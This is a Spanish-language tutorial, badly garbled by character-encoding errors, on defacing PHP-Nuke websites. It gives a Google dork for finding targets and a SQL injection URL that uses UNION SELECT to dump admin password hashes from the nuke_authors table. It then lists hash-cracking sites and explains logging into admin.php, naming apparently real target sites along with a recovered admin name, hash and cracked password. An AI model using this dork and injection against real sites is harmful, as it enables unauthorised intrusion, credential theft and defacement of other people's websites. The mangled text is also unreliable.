Deface a phpNuke

Introduccin
Que tal pues aqu estamos mi nombre es MaRcUs (supongo q habr otros marcus...)
pero venga a quien le importa de vdd? Vamos a lo serio el deace!
Qu es un deface?
"ntes de ir a la prctica veamos que es un deace primero#
$os podra mandar a buscar a google pero como se que son medio lo%os lo vo& aponer
aqu!
'sicamente un deace es ganar acceso ilegitimo por cualquier medio a una (eb &
modiicar su contenido) lo ms com*n es encontrar mensa%es como!
+,ontraten hac-ers para su seguridad hdp.
+hahaha el administrador es un idiota.
,osas por el estilo) tambi/n se suele encontrar el clsico +0eaced b&. & saludos a los
amigos del seudo hac-er.
1o en lo personal preiero no ser destructivo# si acaso de%o un mensa%e +0eaced b&
MaRcUs. & un mail para que me contacten & sepan como corregir la vulnerabilidad.
2ero bueno lo que quieran hacer queda dentro de ustedes.
Qu herramientas necesito?
"unque ha& varias vulnerabilidades a e3plotar nosotros en este manual nos centraremos
al deace de pginas utili4ando php5u-e & para esto necesitamos!
5uestro buen amigo GOOGLE
Una VICI!" (no se preocupen esta la encontraremos mas tarde)
1 el #I$E#O% aunque pueden utili4ar el 6nternet 73plorer pero a mi me gusta mas el
otro.
'ueno si &a tienen todo esto listo e3cepto la victima procedamos.
&e'eccionando una (ictima)
'ueno pues primero vamos con nuestro gran amigo 8998$7 & ponemos esto!
+modules.php?name=Statistics Version PHP-Nuke. (sin las comillas +.)
2ero se preguntaran q es esto# pues simplemente eso nos servir para encontrar sitios
que est/n corriendo en php5u-e) +modules.php?name=Statistics eso nos llevara en
cualquier pagina de phpNuke a sus estadsticas donde nos mostrara algo as
,omo pueden ver es una pagina de estadsticas sobre sistemas operativos &
navegadores) esto simplemente nos sirve para saber que la pagina esta en php5u-e pero
no todas son vulnerables) para veriicar si son vulnerables haremos lo siguiente!
:ustituimos +modules.php?name=Statistics por!
!modules.php?name=Search"t#pe=comments"$%&$%&$%&quer#="
$%&$%&$%&quer#=loquesea"instor#='((')N*+N'(('S,-,./'(('&0&0p1d0&0aid'(('2
3+4'(('nuke5authors
7n nuestro caso la pgina era
http!;;(((.clubsaabespana.com;modules.php?name<:tatistics & nos quedo
http!;;(((.clubsaabespana.com;modules.php?name<:earch=t&pe<comments=
>?@>?@>?@quer&<=
>?@>?@>?@quer&<loquesea=instor&<;AA;U5695;AA;:7$7,B;AA;@)@)p(d)@)aid;AA;C
R9M;AA;nu-eDauthors
:i entran en esa pagina podrn ver que nuestra peticiEn ue recha4ada !: al parecer esa
pagina no es vulnerable. 2ero no importa vamos a buscar otra) entonces vamos a google
& buscamos +modules.php?name=Statistics Version PHP-Nuke. (sin las comillas)
8enial nos dio varios resultados ahora escogemos uno# & probamos cambiando la
direcciEn como lo hicimos anteriormente hasta que alguno nos de algo como esto!
Ven que la busquedo dio un resultado!
*+,ec-,./,0d+fd1*22cf314d,f+2402
7nviado por paquitos el
"d%untar al "rtculo!
(FGH responde)
'ueno pues e3pliquemos lo que es esto
*+,ec-,./,0d+fd1*22cf314d,f+2402 7se es el pass encriptado en mdF
7nviado por paquitos el +paquitos. es el nombre del admin.
"d%untar al "rtculo!
(FGH responde)
'ueno pues &a estamos a la mitad del camino) &a tenemos nuestra victima seleccionada
& estamos casi seguros q es vulnerable solo alta una cosa antes de darnos a la tarea de
crac-ear el mdF) en la direcciEn tienen que veriicar tenga acceso a admin.php lo
hacemos simplemente poniendo en este caso por e%emplo!
7stamos en!
http!;;members.l&cos.co.u-;paquitos;modules.php?name<:earch=t&pe<comments=
>?@>?@>?@quer&<=
>?@>?@>?@quer&<loquesea=instor&<;AA;U5695;AA;:7$7,B;AA;@)@)p(d)@)aid;AA;C
R9M;AA;nu-eDauthors
2ues nada mas ponemos!
http!;;members.l&cos.co.u-;paquitos;admin.php
:i conseguimos la ventana de login perectoII $a (eb es vulnerable ahora si lo q sigue..
C$"C5E"NDO EL !D+
2rimero obviamente necesitamos saber que es un mdF#
"s q vamos a nuestro amigo (((.google.com & buscamos por mdF!
http!;;es.(i-ipedia.org;(i-i;M0F
el primer resultado esta en espaJol# no lo vo& a copiar & pegar) solo necesitan ir &
leerlo cuando acaben regresan#
'ueno como se que no se lo le&eron les digo que es mdF en resumen!
MdF es un algoritmo de encriptaciEn que convierte una palabra o secuencia de palabras
en una cadena compuesta por K? caracteres.
"hora que &a saben lo que es vamos a crac-ear el hash (hash es la cadena q se obtiene
despu/s de la encriptaciEn en este caso! *+,ec-,./,0d+fd1*22cf314d,f+2402)
Benemos dos opciones una usar alg*n programa para crac-earlo o irnos a las bases de
datos que circulan por 6nternet lo mas recomendable creo es ir primero a las bases de
datos & luego si no encontramos nada intentar crac-earlo nosotros mismos) ten en
cuenta que esto toma tiempo# Bambi/n puedes enviar el hash a una de las paginas que
mencionare despu/s & despu/s d uno o dos das tendrs el hash crac-eado#
'ueno pues &o me vo& a centrar nada mas en las paginas (ebs que se dedican a
+recuperar hashs perdidos. si me metiera a lo del programa seria hacer otro manual
sobre este talve4 luego#
'ueno pues &a con nuestro hash nos vamos a ir a cualquiera d estas pags!
http!;;gdataonline.com
http!;;passcrac-ing.com
http!;;passcrac-ing.ru;inde3.php
http!;;(((.plainLte3t.ino
http!;;mil(@rm.com
http!;;mdF.rednoi4e.com
http!;;mdF.altervista.org;
http!;;shm.hardLcore.pl;mdF
http!;;mdF.shalla.de;cgiLbin;inde3.cgi
http!;;mdF.benramse&.com;
7scogemos una pagina & vamos a probar el hash# es cuestiEn de probar) tienen
dierentes bases de datos & si no lo encuentras en una es posible que este en la otra) en
este caso &o vo& a probar en (((.plainLte3t.ino
2erecto al parecer encontrE algo!
60 Submitter Algorithm Hash Value Hex Value Status Submited
?M@HF "non&mous md5 ?FHecMHNKHOdFd@?GGcP@bdHFGbOG chipiron GKGMGPO@GPO?GGe Cracked
NK;NN;?@@G
NG!NN
$as partes!
60! 7s el numero de envo (nada importante mas que nada lo usan para mantener
control)
:ubmitter! 7s quien lo envo para que uese desencriptado normalmente "non&mous) la
orma para el registro depende de cada pg.
"lgorithm! 7s el algoritmo con el que estaba encriptado) nosotros usamos mdF ahora
pero ah mas) aun que en php5u-e solo usan mdF.
Qash! 7ste ue el hash enviado a desencriptar.
Value! 7ste es el que nos interesa es el hash desencriptado en este caso es +chipiron.
este es nuestro pass(ord.
Qe3 Value! 7ste es el valor he3adecimal.
:tatus! 7s en el estado que se encuentra puede ser!
,rac-ing! 7n proceso de crac-eo por lo tanto no ha& contraseJa aun.
Queque! 7n lista de espera para iniciar crac-eo) sin contraseJa aun.
,rac-ed! 1a esta crac-eado) la contraseJa &a esta disponible
5ot Cound! 5o se encontrE la contraseJa) lastima#
:ubmited! $a echa en que ue enviado.
'ueno &a conocemos las partes de esa tabla ahora vamos a lo nos interesa ingresar a la
pagina#
6a tenemos user 7 pass 7 ahora 8ue?
2ues mu& simple nos vamos a la pagina de administraciEn que &a habamos checado
antes (admin.php) recuerden que es necesario este activa# sino no podrn entrar) sino
esta activa puede que sea mane%ada mediante tp la pagina directamente podran tratar
usar el pass(ord del admin. 2ara entrar con ese user & ese pass al tp puede uncionar#
7ntonces nos vamos a!
http!;;members.l&cos.co.u-;paquitos;admin.php
en este caso por e%emplo & nos encontramos con esto!
0amos a login &#
$isto &a estamos dentro ahora &a aqu dentro se pone en cuestiEn su imaginaciEn & su
/tica R0 para hacer nada malo & avisar al (ebmaster sobre el bug & como arreglarlo o
si destruir todo & de%ar su irma !0.
$o que &o suelo hacer para evitar que alguien haga esta in&ecciEn es ir & desactivar el
modulo de search o b*squeda# es solo un conse%o aunque ha& otras soluciones esta es
la mas rpida pero no perecta (si se puede sobrepasar esto pero eso lo tendrn que
encontrar uds#)
9ara fina'i:ar)
,Edigo a buscar en 8oogle! +modules.php?name<:tatistics Version 2Q2L5u-e.
6n&ecciEn sql! modules.php?name<:earch=t&pe<comments=>?@>?@>?@quer&<=
>?@>?@>?@quer&<loquesea=instor&<;AA;U5695;AA;:7$7,B;AA;@)@)p(d)@)aid;AA;CR9M;AA;nu-eDau
thors
,r/ditos! MaRcUs
7mail! roc-ianoSgmail.com
Manual reali4ado para! ,2GGG8R9U2) (((.aleGGG.com